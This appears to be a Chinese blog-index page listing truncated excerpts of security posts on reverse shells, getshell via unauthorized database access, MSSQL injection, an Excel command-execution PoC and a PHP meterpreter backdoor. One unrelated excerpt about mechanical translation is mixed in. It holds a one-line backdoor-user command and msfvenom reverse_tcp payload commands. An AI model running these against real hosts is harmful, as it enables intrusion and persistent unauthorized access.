未授权访问 Date 类型 未授权访问导致getshell 影响范围 复现 (1)shell反弹 (2)结合SSH服务 (3)结合web服务 分析 ...
分类:
数据库 时间:
2019-12-24 23:17:58
阅读次数:
101
nc反弹 当nc没有 e选项的时候 nc 存在 e选项的时候 bash socat 脚本语言: telnet: awk: crontab: 针对交互式不友好 一句话增加用户 useradd newuser;echo "newuser:password"|chpasswd 例:useradd gues ...
分类:
系统相关 时间:
2019-11-29 23:40:31
阅读次数:
102
前言: MSSQL注入攻击是最为复杂的数据库攻击技术,由于该数据库功能十分强大,存储过程以及函数语句十分丰富,这些灵活的语句造就了新颖独特的攻击思路。 MSSQL的显错注入操作: 以联合查询为例: 猜字段 联合查询:union all 猜出输出点使用null填充 注释只有 +、 a 没有 查询系统库 ...
分类:
数据库 时间:
2019-11-26 22:34:26
阅读次数:
200
今天为大家带来一篇关于机械专业英语翻译对照示例文章,这篇文章是道壹翻译请添加李老师个人感悟,欢迎大家一起交流,感谢李老师在做英语翻译百忙之中给大家带来的文章。 机械英语翻译译员对术语诠释: 产品特性分析 采用紧压型稀土高铁铝合金导体,高柔韧、易弯曲、低反弹、抗蠕变、耐腐蚀、连接稳定;绝缘为交联聚乙烯,耐高温、耐潮湿、防燃烧、抗老化、强耐用;铠装层采用铝合金带连锁式铠装,抗压抗冲击,坚固强
分类:
其他好文 时间:
2019-11-20 21:13:48
阅读次数:
87
背景 该漏洞最初由Pieter Ceelen发现。如果安装时启用 ,可实现悄无声息执行命令。 查看打开文件的默认程序,可以看到 文件默认用Excel打开 POC,打开计算器测试 反弹shell测试 总结 默认配置的Excel一般会有宏的提示,对于安全意识不高的群体仍然存在一定的风险。 参考 http ...
分类:
系统相关 时间:
2019-11-18 18:42:22
阅读次数:
112
0x00 Windows,Linux反弹shell生成 Windows: msfvenom -p windows/meterpreter/reverse_tcp lhost=[你的IP] lport=[端口] -f exe > 保存路径 Linux: msfvenom -p linux/x86/me ...
分类:
其他好文 时间:
2019-11-16 14:14:37
阅读次数:
138
0x00 反弹shell概述 反弹shell:即reverse shell,在我们自己的公网vps建立监听,然后让服务器反弹一个shell来连接我们自己的主机,通过反弹的shell去远程控制服务器。 0x01 反弹shell原因 通常由于防火墙、权限不足、端口占用等情况下,无法直接连接目标主机,此时 ...
分类:
系统相关 时间:
2019-11-16 12:18:17
阅读次数:
134
Referrence:https://xax007.github.io/2019-03-07-reverse-encrypted-shell-with-openssl/ 目录 前言 OpenSSL 简介 使用 OpenSSL 生成证书自签名证书 使用 OpenSSL 反弹加密 shell Linux ...
分类:
系统相关 时间:
2019-10-27 22:53:02
阅读次数:
115
0x01 Oracle安装 CentOS 7 安装oracle10g,装了一天,特此记录 oracle9i,10G,11G,各版本下载资源 Centos6/7下静默安装oracle10g 0x02 命令执行 本文测试环境均为: CentOS Linux release 7.2.1511 (Core) ...
分类:
数据库 时间:
2019-10-18 15:57:35
阅读次数:
122
一、PHP后门 在meterpreter中有一个名为PHP meterpreter的payload,利用这个可以成功反弹。步骤如下: 1. 使用msfvenom 创建一个webshell.php 2. 上传到服务器 3.开始监听 4.访问webshell.php的页面 5. 获得反弹Shell pa ...
分类:
Web程序 时间:
2019-10-10 15:36:22
阅读次数:
130
